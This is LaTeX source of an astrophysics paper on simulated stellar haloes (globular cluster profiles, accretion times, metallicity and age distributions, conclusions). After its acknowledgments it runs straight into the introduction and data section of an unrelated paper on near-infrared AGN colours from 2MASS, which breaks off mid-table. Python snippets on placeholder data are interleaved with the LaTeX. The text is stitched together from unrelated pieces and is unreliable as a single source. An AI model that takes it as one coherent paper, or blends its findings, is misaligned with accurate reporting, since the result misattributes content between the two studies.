\begin{figure}
\includegraphics[width=84mm]{fig14.eps}
\caption{Radially averaged surface brightness profiles. Dashed lines
show illustrative Sersic fits to haloes Aq-E and Aq-C (see text),
with arrows indicating the corresponding scale radii. We show
sections of equivalent profiles for the haloes of M31 (including the
inner $r^{1/4}$ `spheroid') and M33 (beyond 10~kpc) as dashed grey
lines (Ibata {et~al.} 2007). We overplot the surface number density
(right-hand axis) of globular clusters in M31 (yellow squares) and
the Milky Way (orange squares), with 40 and 10 clusters per bin,
respectively. These profiles have been arbitrarily normalized to
correspond to an estimate of the surface brightness of halo stars in
the Solar neighbourhood from Morrison (1993), shown by an
orange triangle. Vertical lines are as in \fig{fig:densityprofiles}.}
\label{fig:radialprofiles}
\end{figure}
There is evidence for multiple kinematic and chemical subdivisions
within the Galactic globular cluster population (e.g. Searle \& Zinn 1978; Frenk \& White 1980; Zinn 1993; Mackey \& Gilmore 2004, and
refs. therein). This has led
to suggestions that at least some of these cluster subsets may have
originated in accreted satellites
(Bellazzini, Ferraro \& Ibata 2003; Mackey \& Gilmore 2004; Forbes, Strader, \& Brodie 2004). Support for this conclusion
includes the presence of five globular clusters in the Fornax dwarf
spheroidal (Hodge 1961) and the association of several Galactic
clusters with the Sagittarius nucleus and debris
(e.g. Layden \& Sarajedini 2000; Newberg {et~al.} 2003; Bellazzini {et~al.} 2003). Similarities with the
`structural' properties of stellar populations in the halo have
motivated a longstanding interpretation of globular clusters as halo
(i.e. accretion debris) tracers (e.g. Lynden-Bell \& Lynden-Bell 1995). We
therefore plot in \fig{fig:radialprofiles} the surface density profile
of globular clusters in the Milky Way (Harris 1996) and M31
(confirmed GCs in the Revised Bologna Catalogue -- RBC v3.5,
March 2008; Galleti {et~al.} 2004, 2006, 2007; Kim {et~al.} 2007; Huxor {et~al.} 2008). The Milky Way data have
been projected along an arbitrary axis, and the normalization has been
chosen to match the surface density of Milky Way clusters to an
estimate of the surface brightness of halo stars in the Solar
neighbourhood ($\mu_{V}=27.7\,\rm{mag/arcsec^2}$;
Morrison 1993). We caution that the RBC incorporates data from
ongoing surveys as it becomes available: the M31 GC profile shown here
is therefore substantially incomplete, particularly with regard to the
sky area covered beyond $\sim20$--30~kpc.
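The projection used for the Milky Way clusters here -- collapsing 3D positions along an arbitrary axis and binning in circular annuli -- can be sketched as follows (the random positions below are placeholders for real cluster coordinates):

```python
import numpy as np

def surface_density(xyz, axis, r_edges):
    """Project 3D positions along the unit vector `axis` and return the
    surface number density in circular annuli bounded by `r_edges`."""
    axis = np.asarray(axis, dtype=float)
    axis /= np.linalg.norm(axis)
    # Remove the line-of-sight component to obtain projected 2D radii.
    proj = xyz - np.outer(xyz @ axis, axis)
    r2d = np.linalg.norm(proj, axis=1)
    counts, _ = np.histogram(r2d, bins=r_edges)
    area = np.pi * (r_edges[1:] ** 2 - r_edges[:-1] ** 2)
    return counts / area

rng = np.random.default_rng(1)
xyz = rng.normal(scale=10.0, size=(500, 3))     # placeholder positions [kpc]
edges = np.array([0.0, 5.0, 10.0, 20.0, 40.0])  # annulus edges [kpc]
print(surface_density(xyz, axis=[0.3, 0.5, 0.8], r_edges=edges))
```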
Abadi {et~al.} (2006) showed that their average stellar halo Sersic fit also
approximates the distribution of globular clusters in the Milky Way
and M31. As stated above, the inner regions of our haloes Aq-A, Aq-C
and Aq-D are in broad agreement with the Abadi {et~al.} halo
profile, and hence show some similarities with the observed globular
cluster profiles also. Both the halo and cluster samples show strong
variations from halo to halo, however, and the comparison of these
small samples is inconclusive. A close correspondence between accreted
halo stars and globular clusters would be expected only if the
majority of clusters are accreted, if accreted satellites contribute a
number of clusters proportionate to their stellar mass, and if all
stripped clusters have an equal probability of surviving to
$z=0$. None of these assumptions is realistic, and further work is
required to better constrain the relationship between globular
clusters and stellar haloes.
The multicomponent nature of our haloes, which gives rise to the local
structure in their overall profiles, is examined in more detail in
\fig{fig:deposition_profile}. Here the density profiles of the major
contributors shown in \fig{fig:contributions} are plotted
individually (progenitors contributing $<5\%$ of the halo have been
added to the panel for Aq-F). It is clear from these profiles that
material from a given progenitor can be deposited over a wide range
of radii. The few-progenitor haloes show strong gradients in $\rho
r^2$ while more uniform distributions of this quantity are seen in
their sub-dominant contributors and in most contributors to the
many-progenitor haloes.
\begin{figure}
\includegraphics[]{fig15.eps}
\caption{Individual density profiles (multiplied by $r^2$) for stars
contributed by each of the most significant progenitors of the
halo (defined in \mnsec{sec:defining_haloes}). Line types indicate
the rank order of a progenitor contribution: the bold coloured
line in each panel indicates the most significant contributor,
while lesser contributions are shown by increasingly lighter and
thinner lines. Vertical solid and dashed lines indicate the Solar
shell and virial radius respectively, as
\fig{fig:densityprofiles}. Individual stellar halo components
contribute over a wide radial range, and different components
`dominate' at particular radii. This figure can be used to
interpret the radial trends shown in other figures.}
\label{fig:deposition_profile}
\end{figure}
Finally, we show in \fig{fig:zinfall_gradient} the time at which the
satellite progenitors of halo stars at a given radius were accreted
(this infall time is distinct from the time at which the stars
themselves were stripped, which may be considerably later). An
analogous infall time can be defined for the surviving satellites,
which are shown as points in
\fig{fig:zinfall_gradient}. \newt{W}e would expect
little information to be encoded in an instantaneous sample of the
radii of surviving satellites, \newt{but} their infall times can none
the less be usefully compared with those of halo stars.
\begin{figure}
\includegraphics[]{fig16.eps}
\caption{Lines show, for halo stars at a given radius at $z=0$, the
mean (solid), median and 10/90th percentile (dotted) redshift at
which their parent galaxy was accreted on to the main halo
(\textit{not} the time at which the stars themselves were
stripped). Filled circles show the redshift at which surviving satellites
were accreted; triangles indicate satellites accreted before
$z=7$. Within the solar shell, the stellar halo is typically old in
this `dynamical' sense, whereas beyond 100 kpc its young `dynamical'
age is comparable to that of the surviving satellite population. In
many cases the innermost satellites represent a relic population
that is `older' than the stellar halo at comparable radii.}
\label{fig:zinfall_gradient}
\end{figure}
A gradient to earlier infall times with decreasing radius is apparent
in both the satellites and the many-progenitor haloes. In the case
of the haloes, this reflects the fact that relatively larger apocentres
are associated with later-infalling satellites, enabling them to
deposit material over a greater radial range. Assembly in this manner
is arguably not adequately characterised as `inside out' formation;
late infalling material is added at all radii but has a greater
maximum extent than earlier-infalling material. The result is that
earlier-infalling material comes to \textit{dominate} towards the
centre. For the few-progenitor haloes the profile of infall time is
essentially flat (or shows sharp transitions between populations),
more closely reflecting the contributions of individual progenitors.
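The radial trends of infall redshift plotted in \fig{fig:zinfall_gradient} amount to simple order statistics in radial bins; an unweighted sketch, with placeholder arrays standing in for the simulated star particles, is:

```python
import numpy as np

def radial_infall_profile(r, z_infall, r_edges):
    """Mean, median and 10th/90th percentile infall redshift of halo
    stars in spherical radial bins (unweighted sketch)."""
    idx = np.digitize(r, r_edges) - 1
    rows = []
    for i in range(len(r_edges) - 1):
        z = z_infall[idx == i]
        if z.size == 0:
            rows.append((np.nan,) * 4)
        else:
            rows.append((z.mean(), np.median(z),
                         np.percentile(z, 10), np.percentile(z, 90)))
    return np.array(rows)  # columns: mean, median, p10, p90

rng = np.random.default_rng(2)
r = rng.uniform(3.0, 280.0, size=2000)  # placeholder radii [kpc]
z_infall = 4.0 * np.exp(-r / 100.0) + rng.uniform(0.0, 1.0, size=r.size)
print(radial_infall_profile(r, z_infall, np.array([3.0, 12.0, 50.0, 150.0, 280.0])))
```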
Further to our discussion of satellite survival in our haloes in
\mnsec{sec:assembly}, it is interesting that amongst the surviving
satellites, we observe several accreted at $z>1$. For example, in
the case of Aq-E, six surviving satellites are accreted at
$z\sim3.5$; at the present day this group is found in association
with a concentration of halo stars from a stellar halo progenitor
also infalling at this time. The majority of survivors in each halo
are accreted recently, however, and typically more recently than the
stellar halo progenitors. The opposite is true for the
earliest-accreted survivors, which are accreted earlier than the
halo at the notably small radii at which they are now found. In
general, at any given instant the majority of satellites are more
likely to be located nearer to the apocentre of their orbit than the
pericentre; furthermore, the orbits of the most massive satellites
are likely to have been more circular than their disrupted siblings
and dynamical friction may act to reinforce such a trend. Therefore,
the locations of early-infalling survivors are likely to be fairly
represented by their radius in \fig{fig:zinfall_gradient}. Dynamical
friction acts to contract but also to circularize orbits. Plausibly
these survivors are those that have sunk slowly as the result of
their initially low orbital eccentricities.
\subsubsection{Stellar populations}
\label{sec:stellarpops}
In this section, we show how the multicomponent nature of our stellar
haloes is reflected in their metallicity profiles, and contrast the
stellar populations of surviving satellites with those of halo
progenitors. We caution that a full comparison of the relationship
between the stellar halo and surviving satellites will require more
sophisticated modelling of the chemical enrichment process than is
included in our fiducial model, which adopts the instantaneous
recycling approximation and does not follow individual elemental
abundances. We will address this detailed chemical modelling and
\newt{related observational comparisons} in a subsequent
paper (De Lucia et al. in prep.). The model we adopt here tracks only
total metallicity, defined as the total mass fraction of all metals
relative to the Solar value, $Z/\rm{Z_{\sun}}$ (the absolute value of
which cannot be compared directly with measurements of \feh{}). This
model can nevertheless address the \textit{relative} enrichment
levels of different populations.
\fig{fig:metal_gradient} shows the spherically averaged metallicity
gradient in each halo. Our many-progenitor haloes are characterised by
a metallicity distribution of width $\sim1$ dex and approximately
constant mean value, fluctuating by less than $\pm0.5$ dex over a
range of 100~kpc. This is comparable to observations of the M31 halo,
which show no significant gradient (metallicities varying by $\pm0.14$
dex) in the range 30--60~kpc (Richardson {et~al.} 2009). Localised structure
is most apparent in the few-progenitor haloes: Aq-F shows a clear
separation into two components, while Aq-B and Aq-E exhibit global
trends of outwardly declining metallicity gradients. In all cases the
mean metallicity within the Solar radius is relatively high. These
features can be explained by examining the relative weighting of
contributions from individual progenitors at a given radius, as shown
in the density profiles of \fig{fig:deposition_profile}, bearing in
mind the mass-metallicity relation for satellites that arises in our
model. Where massive progenitors make a significant
luminosity-weighted contribution, the haloes are seen to be
metal-rich. Overall, metallicity gradients are shallower in those
haloes where many significant progenitors make a comparable
contribution, smoothing the distribution over the extent of the
halo. Conversely, metallicity gradients are steeper where only one or
two disproportionately massive satellites make contributions to the
halo (as indicated by the luminosity functions of
\fig{fig:victim_vs_survivor_lf}). Sharp contrasts are created between
the radii over which this metal-rich material is deposited (massive
satellites suffer stronger dynamical friction and sink more rapidly,
favouring their concentration at the centres of haloes) and a
background of metal-poor material from less massive halo
progenitors. This effect is clearly illustrated by the sharp
transition in Aq-F and at two locations (centrally and at
$\sim100\,\rm{kpc}$) in Aq-E.
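The profiles in \fig{fig:metal_gradient} are luminosity-weighted averages in spherical shells; a minimal version of that bookkeeping, with placeholder inputs, is:

```python
import numpy as np

def metallicity_profile(r, logZ, lum, r_edges):
    """Luminosity-weighted mean log10(Z/Zsun) in spherical shells."""
    idx = np.digitize(r, r_edges) - 1
    means = np.full(len(r_edges) - 1, np.nan)
    for i in range(len(r_edges) - 1):
        in_shell = idx == i
        if lum[in_shell].sum() > 0.0:
            means[i] = np.average(logZ[in_shell], weights=lum[in_shell])
    return means

rng = np.random.default_rng(3)
r = rng.uniform(3.0, 200.0, size=5000)       # placeholder radii [kpc]
logZ = rng.normal(-1.0, 0.5, size=r.size)    # ~1 dex wide distribution
lum = rng.lognormal(0.0, 1.0, size=r.size)   # placeholder luminosities
print(metallicity_profile(r, logZ, lum, np.linspace(3.0, 200.0, 6)))
```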
\begin{figure}
\includegraphics[width=84mm]{fig17.eps}
\caption{Radial profiles of luminosity-weighted metallicity (ratio of
total metal mass fraction to the Solar value) for spherical shells
in our six haloes, showing the mean (solid) and median
(thick dotted) profiles, bracketed by the 10th and 90th
percentiles (dotted).}
\label{fig:metal_gradient}
\end{figure}
It follows that the process by which our smooth haloes are
assembled, which gives rise to the steep gradients of progenitor
infall time with redshift shown in \fig{fig:zinfall_gradient}, also
acts to \textit{erase} metallicity gradients. As a result,
measurements of (for example) \feh{} alone do not constrain the local
infall time; a metal-poor halo need not be `old' in the sense of early
assembly. A particularly notable example of this is Aq-E, where the
centrally dominant metal-rich material was assembled into the halo
considerably \textit{earlier} ($z\sim3$) than the diffuse outer
envelope of relatively metal-poor material ($z\sim1$). This is a
manifestation of a mass-metallicity relation in satellites: at fixed
luminosity, an earlier infall time is `compensated' for by more rapid
star formation, resulting in a degree of overall enrichment
comparable to that of a satellite with similar luminosity infalling at lower
redshift. Abundance ratios such as \afe{} indicate the time taken by a
given stellar population to reach its observed level of enrichment,
and so distinguish between rapidly forming massive populations,
truncated by early accretion to the halo, and populations reaching
similar mass and metallicity through gradual star formation
(e.g. Shetrone, C{\^{o}}t{\'{e}} \& Sargent 2001; Tolstoy {et~al.} 2003; Venn {et~al.} 2004; Robertson {et~al.} 2005).
\fig{fig:mdfs} shows luminosity-weighted metallicity distribution
functions (MDFs) for two selections of halo stars: a `Solar shell'
($5<r<12\,\rm{kpc}$; dashed lines) and the entire halo as defined in
\mnsec{sec:defining_haloes} (dotted). We compare these to MDFs for
stars in the surviving satellites in each halo, separating bright
($M_{\rm{V}} < -10$, $r < 280\,\rm{kpc}$; thick, coloured) and
`faint' ($-10<M_{\rm{V}}<-5$; thin, grey) subsets. All distributions
are normalized individually to the total luminosity in their sample
of stars.
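The normalization described above -- each MDF divided by the total luminosity of its own sample -- corresponds to a weighted histogram; a sketch with placeholder inputs:

```python
import numpy as np

def mdf(logZ, lum, bins):
    """Luminosity-weighted metallicity distribution function,
    normalized to the total luminosity of the sample."""
    hist, edges = np.histogram(logZ, bins=bins, weights=lum)
    return hist / lum.sum(), edges

rng = np.random.default_rng(4)
logZ_halo = rng.normal(-1.0, 0.5, size=4000)        # placeholder halo stars
lum = rng.lognormal(0.0, 1.0, size=logZ_halo.size)  # placeholder luminosities
frac, edges = mdf(logZ_halo, lum, bins=np.linspace(-4.0, 2.0, 31))
print(frac.sum())  # ~1 when all stars fall inside the bin range
```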
\begin{figure}
\includegraphics[clip=True, trim=0mm 0cm 0cm 0cm]{fig18.eps}
\caption{Metallicity distribution functions of bright ($M_{\rm{V}} <
-10$; solid coloured) and faint ($-10<M_{\rm{V}} < -5$; solid grey)
satellites, halo stars in the `Solar shell' (dashed) and the entire
halo ($3<r<280\;\rm{kpc}$, dotted). $Z$ is the total mass fraction
of all metals.}
\label{fig:mdfs}
\end{figure}
The MDF of Solar-shell halo stars is typically broad, and tends to
peak at slightly higher metallicity (by $<0.5$ dex) than the
aggregated surviving bright satellites. The halo as a whole is
comparable to the Solar shell. A clear disparity is only evident in
Aq-E, where the halo appears to reflect more closely the distribution
of fainter, lower-metallicity satellites. In all cases, the MDF of
these faint satellites peaks at considerably lower metallicity than in
the halo or brighter satellites. \movt{We find that the `average'
halo has an equivalent number of very metal-poor stars to the
surviving bright satellites, although there are clear exceptions in
individual cases. The fainter satellites have a substantially
greater fraction of very metal-poor stars, in accordance with their
low mean metallicities. Surviving satellites contain a greater
fraction of moderately metal-poor stars
($\log_{10}(Z/\rm{Z_{\sun}})<-2.5$) than the halo.}
\movt{Our halo models suggest that similar numbers of
comparably luminous (and hence metal-rich) satellites contribute to
the bright end of both the halo-progenitor and the
surviving-satellite luminosity functions, and that these bright
satellites are the dominant contributors to the halo. This supports
the view that halo MDFs should resemble those of bright survivor
satellites in their metal-poor tails. At very low metallicities the
halo is dominated by the contribution of low-luminosity satellites
which are exclusively metal-poor; the stars associated with these
faint contributors are expected to represent only a very small
fraction of the total halo luminosity.}
Finally, \fig{fig:agedistribution} compares the luminosity-weighted
age distributions of halo stars in the Solar shell with those in the
surviving satellites ($M_{\rm{V}} < -5$), separated into bright and
faint subsets. \newt{The
average of all six haloes} contains essentially no stars younger
than 5~Gyr (if we exclude halo Aq-F, which is strongly influenced by
the late accretion of an SMC-like object, this minimum age rises to
8~Gyr). The median age of halo stars is $\sim11$ Gyr. By contrast, the
brightest satellites have a median age of $\sim8$ Gyr and a
substantial tail to young ages (with $\sim20\%$ younger than 4 Gyr and
$\sim90\%$ younger than the median halo age). The distribution of old
stars in the faintest surviving satellites is similar to that of the
halo.
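The cumulative luminosity-weighted age distributions compared here reduce to a sorted cumulative sum of luminosities; a sketch, with a toy input standing in for the simulated star particles:

```python
import numpy as np

def cumulative_age_distribution(age_gyr, lum):
    """Fraction of light in stars younger than each age, plus the
    luminosity-weighted median age."""
    order = np.argsort(age_gyr)
    ages = age_gyr[order]
    frac = np.cumsum(lum[order]) / lum.sum()
    median_age = ages[np.searchsorted(frac, 0.5)]
    return ages, frac, median_age

rng = np.random.default_rng(5)
age = rng.uniform(8.0, 13.0, size=3000)       # toy input: old stars [Gyr]
lum = rng.lognormal(0.0, 1.0, size=age.size)  # placeholder luminosities
ages, frac, med = cumulative_age_distribution(age, lum)
print(round(med, 1))  # weighted median age of the toy input, ~10.5 Gyr
```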
\begin{figure}
\includegraphics[width=84mm,clip=True, trim=0mm 0cm 0cm 0cm]{fig19.eps}
\caption{The cumulative luminosity-weighted age distribution
\newt{(mean of all six simulations)} for halo stars in the Solar
shell (\newt{$5 < r < 12$ kpc, }orange, top \newt{panel}) compared
to bright (\newt{$-15 <M_{\rm{V}} < -10$; } light green, bottom) and
faint (\newt{$-10 < M_{\rm{V}} < -5$; }dark green, centre)
satellites, showing individual contributions
from each halo (dashed\newt{, colours as in previous figures})
\newt{to the mean value represented by} each panel. The
total stellar masses of these three components over all haloes are
$1.04\times10^{9}$, $7.45\times10^{8}$ and
$3.45\times10^{8}\,\rm{M_{\sun}}$, respectively. }
\label{fig:agedistribution}
\end{figure}
The true age distribution of halo stars is poorly constrained in
comparison to that of the satellites
(e.g. Tolstoy, Hill \& Tosi 2009). By comparing the colour and
metallicity distributions of Milky Way halo stars to those of the
Carina dSph, Unavane, Wyse \& Gilmore (1996) have argued that similar satellites
(i.e. those with a substantial fraction of intermediate-age stars)
could not contribute more than $\sim1\%$ to the halo (equivalent to a
maximum of $\sim60$ halo progenitors of Carina's luminosity). A
corresponding limit of $\leq6$ Fornax-like accretions in the last
$\sim10$ Gyr was derived from an analysis of higher metallicity stars
by the same authors, consistent with the progenitor populations of our
simulated stellar haloes.
It is important in this context that the satellites themselves form
hierarchically. In our models, between ten and twenty progenitors
are typical for a (surviving) galaxy of stellar mass comparable to
Sagittarius, or five to ten for a Fornax analogue. Satellites in
this mass range are the most significant contributors to our stellar
haloes. Their composite nature is likely to be reflected in their
stellar population mix and physical structure, which could
complicate attempts to understand the halo `building blocks' and the
surviving satellites in terms of simple relationships between mass,
age and metallicity.
\section{Conclusions}
\label{sec:conclusion}
We have presented a technique for extracting information on the spatial
and kinematic properties of galactic stellar haloes that combines a very
high resolution fully cosmological \lcdm{} simulation with a
semi-analytic model of galaxy formation. We have applied this technique
to six simulations of isolated dark matter haloes similar to or slightly
less massive than that of the Milky Way, adopting a fiducial set
of parameter values in the semi-analytic model \galform{}. The
structural properties of the surviving satellites have been used as a
constraint on the assignment of stellar populations to dark matter. We
found that this technique results in satellite populations and stellar
haloes in broad agreement with observations of the Milky Way and M31, if
allowance is made for differences in dark halo mass.
Our method of assigning stellar populations to dark matter particles
is, of course, a highly simplified approach to modelling star
formation and stellar dynamics. The nature of star formation in
dwarf galaxy haloes remains largely uncertain. In future,
observations of satellites interpreted alongside high-resolution
hydrodynamical simulations will test the validity of approaches such
as ours. As a further simplification, our models do not account for
a likely additional contribution to the halo from scattered {\em in
situ} (disc) stars, although we expect this contribution to be
minimal far from the bulge and the disc plane. The results outlined
here therefore address the history, structure and stellar
populations of the accreted halo component in isolation.
Our results can be summarised as follows:
\begin{itemize}
\item Our six stellar haloes are predominantly built by satellite
accretion events occurring between $1<z<3$. They span a
range of assembly histories, from
`smooth' growth (with a number of roughly equally massive
progenitors accreted steadily over a Hubble time) to growth in one
or two discrete events.
\item Stellar haloes in our model are typically built from fewer than
5 significant contributors. These significant objects have stellar
masses comparable to the brightest classical dwarf spheroidals of
the Milky Way; by contrast, fewer faint satellites contribute to the
halo than are present in the surviving population.
\item Typically, the most massive halo contributor is accreted at a
lookback time of between 7 and 11 Gyr ($z\sim1.5-3$) and deposits
tidal debris over a wide radial range, dominating the contribution
at large radii. Stars stripped from progenitors accreted at even
earlier times usually dominate closer to the centre of the halo.
\item A significant fraction of the stellar halo consists of stars
stripped from individual \textit{surviving} galaxies, contrary to
expectations from previous studies (e.g. Bullock \& Johnston 2005). It
is the most recent (and significant) contributors that are likely
to be identifiable as surviving bound cores. Such objects have
typically lost $\sim90\%$ of their original stellar mass.
\item We find approximately power-law density profiles for the
stellar haloes in the range $10<r<100$ kpc. Those haloes formed by a
superposition of several comparably massive progenitors have slopes
similar to those suggested for the Milky Way and M31 haloes, while
those dominated by a disproportionately massive progenitor have
steeper slopes.
\item Our haloes have strongly prolate distributions of stellar mass
in their inner regions ($c/a\sim0.3$), with one exception, where an
oblate, disc-like structure dominates the inner $10-20$ kpc.
\item Haloes with several significant progenitors show little or no
radial variation in their mean metallicity ($Z/\mathrm{Z_{\sun}}$)
up to 200~kpc. Those \newt{in which} a small number of progenitors
dominate show stronger metallicity gradients over their full extent
or sharp transitions between regions of different metallicity. The
centres of these haloes are typically more enriched than their outer
regions.
\item The stellar populations of the halo are likely to be chemically
enriched to a level comparable to that of the bright surviving
satellites, but to be as old as the more metal-poor surviving `ultra
faint' galaxies. The very metal-poor tail of the halo distribution
is dominated by contributions from a plethora of faint galaxies that
are insignificant contributors to the halo overall.
\end{itemize}
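The axis ratios quoted above are derived from ellipsoidal fits to the stellar mass distribution; the essential step -- eigenvalues of a second-moment tensor -- can be sketched as follows (a simple non-iterative version, not the iteratively reweighted fit used in the analysis):

```python
import numpy as np

def axis_ratios(xyz):
    """Axis ratios (b/a, c/a) from the eigenvalues of the unweighted
    second-moment tensor of particle positions."""
    M = xyz.T @ xyz / len(xyz)
    eig = np.sort(np.linalg.eigvalsh(M))[::-1]  # a^2 >= b^2 >= c^2
    a, b, c = np.sqrt(eig)
    return b / a, c / a

rng = np.random.default_rng(6)
# Toy prolate distribution: one long axis and two short axes.
xyz = rng.normal(size=(20000, 3)) * np.array([1.0, 0.3, 0.3])
print(axis_ratios(xyz))  # both ratios close to 0.3, i.e. strongly prolate
```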
\section*{Acknowledgments}
The simulations for the Aquarius Project were carried out at the
Leibniz Computing Centre, Garching, Germany, at the Computing Centre
of the Max-Planck-Society in Garching, at the Institute for
Computational Cosmology in Durham, and on the `STELLA' supercomputer
of the LOFAR experiment at the University of Groningen.
APC is supported by an STFC postgraduate studentship, acknowledges
support from the Royal Astronomical Society and Institute of Physics,
and thanks the KITP, Santa Barbara, for hospitality during the early
stages of this work. He also thanks \newt{Annette Ferguson for helpful
comments and} Ben Lowing for code to calculate ellipsoidal fits to
particle distributions. CSF acknowledges a Royal Society Wolfson
Research Merit Award. AH acknowledges support from a VIDI grant by
the Netherlands Organisation for Scientific Research (NWO). AJB
acknowledges the support of the Gordon \& Betty Moore foundation. JW
acknowledges a Royal Society Newton Fellowship. GDL acknowledges
financial support from the European Research Council under the
European Community's Seventh Framework Programme (FP7/2007-2013)/ERC
grant agreement n.~202781. \newt{We thank the referee for their
suggestions, which improved the presentation and clarity of the
paper.}
\section{Introduction}
Active Galactic Nuclei (AGNs) are tremendously energetic sources,
in which vast amounts of energy are generated
by gravitational accretion onto a supermassive black hole.
The radiation at nearly all wavelengths enables us to detect AGNs in multiwavelength observations.
Hence, AGNs have been studied at various wavelengths.
Past studies show that their Spectral Energy Distributions (SEDs) are
roughly represented by a power-law (i.e., $f_\nu \propto \nu^{-\alpha}$),
whilst normal galaxies produce an SED that peaks at $\sim 1.6 \mu$m,
the composite blackbody spectrum of their stellar population.
Because the colours of an object provide us with rough but essential information about its spectrum,
colours are important clues for distinguishing AGNs from normal stars.
Colour selection is an efficient technique for this purpose and
has played an important role in extracting AGN candidates without spectroscopic observations.
A classic method is known as the $UV$-excess \citep[$UVX$; ][]{Sandage1965-ApJ,Schmidt1983-ApJ,Boyle1990-MNRAS}.
The $UVX$ technique exploits the fact that quasars are relatively brighter than stars at shorter wavelengths
and therefore occupy a bluer locus than stars in a colour-colour diagram (CCD).
In addition, many AGN candidates have been selected on the basis of colours
at various wavelengths:
optical and near-infrared \citep{Glikman2007-ApJ}, and
mid-infrared \citep{Lacy2004-ApJS,Stern2005-ApJ}.
These studies provide us with clues about the properties of AGNs.
Target selection of high redshift quasars has also been performed
using their colours, mainly in optical wavelengths
\citep[e.g., ][]{Fan2000-AJ,Fan2001-AJ,Fan2003-AJ}.
However, near-infrared properties are required
when we try to select targets such as higher redshift quasars,
since the shift of the Lyman break to longer wavelengths makes
observations difficult at optical wavelengths.
Therefore, near-infrared selection should be useful technique to extract high-redshift quasars.
In this paper, we present a study of the near-infrared colours of AGNs
and demonstrate, by both observed and simulated colours, that
the near-infrared colours can separate AGNs from normal stars.
Additionally, we predict near-infrared colour evolution based on a Monte-Carlo simulation.
In Sect. \ref{Data}, we introduce the catalogues of AGNs
which are used in order to investigate the observed colours.
We confirm the near-infrared properties of spectroscopically confirmed AGNs
on the basis of the near-infrared CCD and
redshift-colour relations in Sect. \ref{Properties}.
In Sect. \ref{Simulation}, we simulate the near-infrared colours
using Hyperz code developed by \citet{Bolzonella2000-AA} and
demonstrate that AGNs reside in a distinct position in the near-infrared CCD.
In Sect. \ref{Discussion}, we consider the other probable objects
which are expected to have near-infrared colours similar to those of AGNs.
\if2
\begin{figure*}[t]
\begin{tabular}{cc}
(a) & (b) \\
\begin{minipage}[tbp]{0.5\textwidth}
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/qso-agn12-ccd.eps}}
\end{center}
\end{minipage}
&
\begin{minipage}[htbp]{0.5\textwidth}
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/sdss-qso-ccd.eps}}
\end{center}
\end{minipage}
\end{tabular}
\caption{(a) The distribution of AGNs in QA catalogue.
(b) The distribution of quasars in SQ catalogue.
The stellar locus in \citet{Bessell1988-PASP} and
the reddening vector taken from \citet{Rieke1985-ApJ} are also shown.
\label{CCD1}}
\end{figure*}
\fi
\begin{figure*}[tbp]
\begin{center}
\begin{tabular}{cc}
(a) & (b) \\
\resizebox{50mm}{!}{\includegraphics[]{figure/qso_agn12-ccd-0z1.eps}} &
\resizebox{50mm}{!}{\includegraphics[]{figure/sdss_qso-ccd-0z1.eps}} \\
\resizebox{50mm}{!}{\includegraphics[]{figure/qso_agn12-ccd-1z2.eps}} &
\resizebox{50mm}{!}{\includegraphics[]{figure/sdss_qso-ccd-1z2.eps}} \\
\resizebox{50mm}{!}{\includegraphics[]{figure/qso_agn12-ccd-2z3.eps}} &
\resizebox{50mm}{!}{\includegraphics[]{figure/sdss_qso-ccd-2z3.eps}} \\
\resizebox{50mm}{!}{\includegraphics[]{figure/qso_agn12-ccd-3z4.eps}} &
\resizebox{50mm}{!}{\includegraphics[]{figure/sdss_qso-ccd-3z4.eps}} \\
\resizebox{50mm}{!}{\includegraphics[]{figure/qso_agn12-ccd-4z5.eps}} &
\resizebox{50mm}{!}{\includegraphics[]{figure/sdss_qso-ccd-4z5.eps}} \\
\end{tabular}
\caption{(a) The distribution of AGNs in the QA catalogue.
(b) The distribution of quasars in the SQ catalogue.
The stellar locus \citep{Bessell1988-PASP}, the CTTS locus \citep{Meyer1997-AJ}, and
the reddening vector taken from \citet{Rieke1985-ApJ} are also shown.
\label{CCD1}}
\end{center}
\end{figure*}
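The slope of the reddening vector drawn in these diagrams follows from broadband extinction ratios. Using the commonly quoted \citet{Rieke1985-ApJ} values ($A_J \simeq 0.282\,A_V$, $A_H \simeq 0.175\,A_V$, $A_K \simeq 0.112\,A_V$; quoted here as approximate and to be checked against the original table):

```python
# Extinction ratios A_band / A_V (commonly quoted Rieke & Lebofsky 1985
# values; treat as indicative and verify against the original table).
A_OVER_AV = {"J": 0.282, "H": 0.175, "K": 0.112}

def reddening_vector(av):
    """Colour excesses E(J-H) and E(H-K) produced by A_V = av mag."""
    e_jh = (A_OVER_AV["J"] - A_OVER_AV["H"]) * av
    e_hk = (A_OVER_AV["H"] - A_OVER_AV["K"]) * av
    return e_jh, e_hk

e_jh, e_hk = reddening_vector(10.0)  # A_V = 10 mag
print(e_jh, e_hk, e_jh / e_hk)      # slope E(J-H)/E(H-K) ~ 1.7
```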
\section{Data}\label{Data}
We examine the near-infrared properties of quasars/AGNs using 2MASS magnitudes.
The samples of quasars/AGNs are extracted from
the Sloan Digital Sky Survey Data Release 5 (SDSS-DR5) quasar catalog and
the catalogue of Quasars and Active Galactic Nuclei (12th Ed.);
these catalogues are briefly introduced below.
\subsection{2MASS}
The Two Micron All Sky Survey \citep[2MASS
\footnote{2MASS web site (http://www.ipac.caltech.edu/2mass/)}; ][]{Skrutskie2006-AJ}
is a project which observed 99.998\% of the whole sky
in the J (1.25 $\mu$m), H (1.65 $\mu$m), and Ks (2.16 $\mu$m) bands,
at Mt. Hopkins, AZ (the Northern Hemisphere) and at CTIO, Chile (the Southern Hemisphere)
between June 1997 and February 2001.
The instruments are both highly automated 1.3-m telescopes equipped with three-channel cameras,
each channel consisting of a 256 $\times$ 256 array of HgCdTe detectors.
The 2MASS obtained 4 121 439 FITS images (pixel size $\sim2''_{\cdot}0$) with 7.8 s of integration time.
The $10 \sigma$ point-source detection levels are better than 15.8, 15.1, and 14.3 mag
at J, H, and K$_\textnormal{\tiny S}$ bands.
The Point Source Catalogue (PSC) was produced using these images and catalogued 470 992 970 sources.
The images and the PSC are publicly available on the 2MASS web site.
\begin{table*}[tbp]
\begin{center}
\begin{tabular}{crrrrrr}
\hline \hline
redshift & \multicolumn{3}{c}{QA catalogue} & \multicolumn{3}{c}{SQ catalogue} \\
range & \multicolumn{3}{c}{-----------------------------------} & \multicolumn{3}{c}{-----------------------------------} \\
& Region I & Region II & total & Region I & Region II & total \\ \hline
$0 \leq z \leq 1$ & 1 671 (27) & 4 480 (73) & 6 151 & 222 (11) & 1 869 (89) & 2 091 \\
$1 < z \leq 2$ & 238 (47) & 265 (53) & 503 & 222 (47) & 249 (53) & 471 \\
